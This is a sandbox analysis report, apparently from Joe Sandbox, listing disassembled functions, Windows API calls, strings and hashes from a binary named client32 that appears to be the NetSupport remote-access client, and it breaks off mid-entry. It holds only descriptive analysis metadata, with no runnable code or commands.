Luid Low=%x, High=%x, Attr=%x, name=%s, xrefs: 110273AE

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$CloseCurrentHandleLookupNameOpenPrivilege_free
String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
API String ID: 2058255784-3275751932
Opcode ID: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
Instruction ID: ade80763f836c408a2a1d446ea8312ce3e6dd7fa4b179276d35611dba123a850
Opcode Fuzzy Hash: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
Instruction Fuzzy Hash: D42176B5D0021AAFD710DFE4DC85EAFBBBDEF44704F108119EA15A7240D770A906CBA1

Function 110570C0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetTickCount.KERNEL32 ref: 11057136

Part of subcall function 11157010: LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
Part of subcall function 11157010: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4

GetTickCount.KERNEL32 ref: 11057293

Strings

gfff, xrefs: 11057112
Client, xrefs: 110570FA
DisableWirelessInfo, xrefs: 110570F5
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 110572D6, 11057302
Info. NC_WIRELESS took %d ms, xrefs: 110572A2
IsA(), xrefs: 110572DB, 11057307

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$LibraryLoad__wcstoi64
String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$gfff
API String ID: 1442689885-2337161965
Opcode ID: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
Instruction ID: 84ed5054cfcb45ae474b39cb997af099e397576dfe613bc4edcee20f92af9c19
Opcode Fuzzy Hash: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
Instruction Fuzzy Hash: F8916D75E0065E9FCB45CF94C884AEEF7B6BF58318F104158E819AB281DB30AE45CBA1

Function 68C7CE00 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 68C7CE20

Part of subcall function 68C81913: std::exception::exception.LIBCMT ref: 68C81928
Part of subcall function 68C81913: __CxxThrowException@8.LIBCMT ref: 68C8193D
Part of subcall function 68C81913: std::exception::exception.LIBCMT ref: 68C8194E

_memmove.LIBCMT ref: 68C7CEA7
_memmove.LIBCMT ref: 68C7CECB
_memmove.LIBCMT ref: 68C7CF05
_memmove.LIBCMT ref: 68C7CF21
std::exception::exception.LIBCMT ref: 68C7CF6B
__CxxThrowException@8.LIBCMT ref: 68C7CF80

Strings

deque<T> too long, xrefs: 68C7CE1B

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 8c1b275c441fdfeeec7777cf6e204872c2bb93ed4864f5a9fc5f7f676f4803bf
Instruction ID: affd0ff320a1715ebfe5314aad21c21f5432c2d4c1bc64c4f1f231398e759a8a
Opcode Fuzzy Hash: 8c1b275c441fdfeeec7777cf6e204872c2bb93ed4864f5a9fc5f7f676f4803bf
Instruction Fuzzy Hash: 8141A8B2E00105ABDB14CE68CC81AAEB7F9EF84214F99C669DC29D7344F734EA01C790

Function 68C63E90 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 68C63EB0

Part of subcall function 68C81913: std::exception::exception.LIBCMT ref: 68C81928
Part of subcall function 68C81913: __CxxThrowException@8.LIBCMT ref: 68C8193D
Part of subcall function 68C81913: std::exception::exception.LIBCMT ref: 68C8194E

_memmove.LIBCMT ref: 68C63F39
_memmove.LIBCMT ref: 68C63F5D
_memmove.LIBCMT ref: 68C63F97
_memmove.LIBCMT ref: 68C63FB3
std::exception::exception.LIBCMT ref: 68C63FFD
__CxxThrowException@8.LIBCMT ref: 68C64012

Strings

deque<T> too long, xrefs: 68C63EAB

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 0b4e3260612c6bc7067d3c3ea78796269b96f66a309ccbf9100eb22e9116f8c0
Instruction ID: bce3be913642b35fdcdddfa45e7bf522b9c0053199479c838e22a15da7b7f0e1
Opcode Fuzzy Hash: 0b4e3260612c6bc7067d3c3ea78796269b96f66a309ccbf9100eb22e9116f8c0
Instruction Fuzzy Hash: 1741B7B2E001059BDB14CE78CC81AAEB7F5EF80224F598679EC18D7344F635EA4187A1

Function 11125040 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11125060

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

_memmove.LIBCMT ref: 111250EA
_memmove.LIBCMT ref: 1112510E
_memmove.LIBCMT ref: 11125148
_memmove.LIBCMT ref: 11125164
std::exception::exception.LIBCMT ref: 111251AE
__CxxThrowException@8.LIBCMT ref: 111251C3

Strings

deque<T> too long, xrefs: 1112505B

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 183d6bf1559b291c5763c7d26f68faa2325f723434c353e3dd27bc0bce6f3659
Instruction ID: 0f323eff97a08ef0bfb1d310de9271f6685152ce05bf58ee348bace92ff13d14
Opcode Fuzzy Hash: 183d6bf1559b291c5763c7d26f68faa2325f723434c353e3dd27bc0bce6f3659
Instruction Fuzzy Hash: 0541E776E00115ABDB54CE68CCC1AEEF7E5EF84214F69C668D81AD7344EA34EA41CBD0

Function 110051C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 110051CE
_memset.LIBCMT ref: 110051F0
GetMenuItemID.USER32(?,00000000), ref: 11005204
CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4

Strings

0, xrefs: 110051FD

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountEnable_memset
String ID: 0
API String ID: 2755257978-4108050209
Opcode ID: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
Instruction ID: 151c37117e6a4efcf468b3f2afefe3ee8c103672a57a50470b6f5af14a9aa5dd
Opcode Fuzzy Hash: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
Instruction Fuzzy Hash: A031A370D0121ABBEB01DFA4D889BEEBBFCEF46358F008159F951E6240E7759A44CB51

Function 68C65F20 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 68sleepwindowCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?), ref: 68C65F77
wsprintfA.USER32 ref: 68C65FB2
MessageBoxA.USER32(00000000,?,NetSupport,00000004), ref: 68C65FC7
Sleep.KERNEL32(00000000), ref: 68C65FFF

Strings

NetSupport, xrefs: 68C65FBC
_Debug, xrefs: 68C65F46
*LineSpeed, xrefs: 68C65F41
Limit transmission speed to %d bps?, xrefs: 68C65FAC

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: MessageSleepVersionwsprintf
String ID: *LineSpeed$Limit transmission speed to %d bps?$NetSupport$_Debug
API String ID: 1064562911-2508291834
Opcode ID: f6abb5f0cd011ca9fffd1aef25b63e799fbc1b44762cab3a95c1c4baad04508d
Instruction ID: 2e07178a24aae306ab5199164ee50af70ec08a08cdc41089df8e990eee3cbb29
Opcode Fuzzy Hash: f6abb5f0cd011ca9fffd1aef25b63e799fbc1b44762cab3a95c1c4baad04508d
Instruction Fuzzy Hash: B721A276E00118DBDF04DFA4DD99FAD77B8EB45318F510179EA0AAB180F7319945CB50

Function 68C99FC7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 68C99FD1
DName::DName.LIBCMT ref: 68C99FDD

Part of subcall function 68C97CA8: DName::doPchar.LIBCMT ref: 68C97CD9

UnDecorator::getScopedName.LIBCMT ref: 68C9A01C
DName::operator+=.LIBCMT ref: 68C9A026
DName::operator+=.LIBCMT ref: 68C9A035
DName::operator+=.LIBCMT ref: 68C9A041
DName::operator+=.LIBCMT ref: 68C9A04E

Strings

void, xrefs: 68C9A02D

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 78c652399fef39db4046fa86b743023ca03323590678777fa798120e9f95c2e3
Instruction ID: 43776f4a5d39d2ed927ee0f8cd577bd3d3db20c076e97f05dc169830fd81ce95
Opcode Fuzzy Hash: 78c652399fef39db4046fa86b743023ca03323590678777fa798120e9f95c2e3
Instruction Fuzzy Hash: 1E117C75D00208AFDF05DFA8D995EBD7BB4EB41308F8480D9D416AB2A1FB70DA46CB51

Function 1114F1D0 Relevance: 13.6, APIs: 9, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 1114F203
CreateCompatibleDC.GDI32(00000000), ref: 1114F219
SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
SelectObject.GDI32(00000000,00000000), ref: 1114F33B
SelectObject.GDI32(00000000,?), ref: 1114F361
SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
DeleteDC.GDI32(00000000), ref: 1114F378
ReleaseDC.USER32(00000000,?), ref: 1114F387

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
String ID:
API String ID: 602542589-0
Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59

Function 1100D3B0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,111918F0), ref: 1100D3C4
GetProcAddress.KERNEL32(00000000,111918E0), ref: 1100D3D8
GetProcAddress.KERNEL32(00000000,111918D0), ref: 1100D3ED
GetProcAddress.KERNEL32(00000000,111918C0), ref: 1100D401
GetProcAddress.KERNEL32(00000000,111918B4), ref: 1100D415
GetProcAddress.KERNEL32(00000000,11191894), ref: 1100D42A
GetProcAddress.KERNEL32(00000000,11191874), ref: 1100D43E
GetProcAddress.KERNEL32(00000000,11191864), ref: 1100D452
GetProcAddress.KERNEL32(00000000,11191854), ref: 1100D467

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
Instruction ID: 9f027eddd4dddc581f186f25ec93b792fa700742cd5a4619bf017c7ec0e1ed24
Opcode Fuzzy Hash: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
Instruction Fuzzy Hash: 4B31BBB59122349FE706DBE4C8D5A76B7E9E34C758F00857AE93083248D7F4A881CFA0

Function 1106D060 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,62C07B5E,?,?,?), ref: 1106D0E2
SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2

Strings

Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106D0C5
..\ctl32\Connect.cpp, xrefs: 1106D2AA
erased=%d, idata->dead=%d, xrefs: 1106D293

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterEventSection
String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
API String ID: 2291802058-2272698802
Opcode ID: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
Instruction ID: b22ba82a88fbe9628385044aa67eb00d20c4b44079c4ac5070634ae5489f2a97
Opcode Fuzzy Hash: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
Instruction Fuzzy Hash: EE71BC70E00286EFEB15CF64C884F9DBBF9AB04314F0481D9E44A9B291D770E9C5CB90

Function 68C66DF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C66DFD
#16.WSOCK32(68C6A730,?,00000001,00000000,?,68C6A730,?,00002000,,?,68C6ACF4,00000000,00000000,?,?,00000010), ref: 68C66E4C
